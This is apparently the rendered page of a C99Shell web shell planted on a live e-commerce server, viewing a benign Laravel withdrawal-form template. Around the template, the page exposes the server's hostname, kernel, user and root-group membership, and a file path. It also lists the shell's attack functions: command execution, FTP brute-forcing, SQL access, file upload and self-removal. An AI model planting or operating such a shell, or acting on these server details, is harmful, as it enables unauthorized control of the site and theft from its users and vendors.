!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/ecom1.picotech.app/public_html_ecom1/resources/views/vendor/withdrawal/   drwxr-xr-x
Free 25.52 GB of 117.98 GB (21.63%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     withdraw.blade.php (3.86 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
@extends('vendor.layouts.app')
@section('page_title', __('Withdraw'))

@section('content')
    <!-- Main content -->
    <div class="list-container" id="vendor-wallet-withdraw-container">
        <div class="card">
            <div class="card-header d-md-flex justify-content-between align-items-center">
                <h5> <a href="{{ route('vendorWithdrawal.index') }}">{{ __('Withdrawal') }}</a> >> {{ __('Money') }} </h5>
                <div class="mt-md-0 mt-2">
                    <h4 class="f-w-300 mt-2">
                        {{ formatNumber(auth()->user()->wallet()->balance) }}
                    </h4>
                </div>
            </div>

            <div class="card-body p-0">
                <div class="card-block pt-2 p-4">
                    <div class="row">
                        <div class="col-sm-7">
                            @if ($methods->count())
                            <h5 class="text-secondary mb-4">{{ ucwords(__('Send withdrawal request')) }}</h5>
                            <form action="{{ route('vendorWithdrawal.money') }}" method="post" class="form-horizontal ">
                                @csrf
                                <input type="hidden" name="currency_id" value="{{ preference('dflt_currency_id') }}">
                                <div class="form-group row">
                                    <label class="col-sm-4 control-label require" for="payment_method">{{ __('Payment Method') }}</label>
                                    <div class="col-sm-6">
                                        <select class="form-control select2-hide-search" id="payment_method" name="withdrawal_method_id" required oninvalid="this.setCustomValidity('{{ __('This field is required.') }}')"> >
                                            <option value="">{{ __('Select One') }}</option>
                                            @foreach ($methods as $method)
                                                <option {{ optional($method->withdrawalSetting)->is_default ? 'selected' : '' }} value="{{ $method->id }}">{{ $method->method_name }}</option>
                                            @endforeach
                                        </select>
                                    </div>
                                </div>

                                <div class="form-group row">
                                    <label class="col-sm-4 control-label require" for="amount">{{ __('Amount') }}</label>
                                    <div class="col-sm-6">
                                        <input type="text" class="form-control positive-float-number inputFieldDesign" name="amount" id="amount"
                                            required oninvalid="this.setCustomValidity('{{ __('This field is required.') }}')">
                                    </div>
                                </div>

                                <div class="col-sm-8 px-0">
                                    <a href="{{ route('vendorWithdrawal.index') }}" class="btn custom-btn-cancel all-cancel-btn">{{ __('Cancel') }}</a>
                                    <button class="btn custom-btn-submit" type="submit" id="submitBtn"><i class="comment_spinner spinner fa fa-spinner fa-spin custom-btn-small display_none"></i><span id="spinnerText">{{ __('Submit') }}</span></button>
                                </div>
                            </form>
                            @else
                                <h4 class="py-5 text-right">{{ __('No payment method found. Please contact with admin.') }}</h4>
                            @endif
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
@endsection

@section('js')
    <script src="{{ asset('/public/dist/js/custom/validation.min.js') }}"></script>
@endsection

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.004 ]--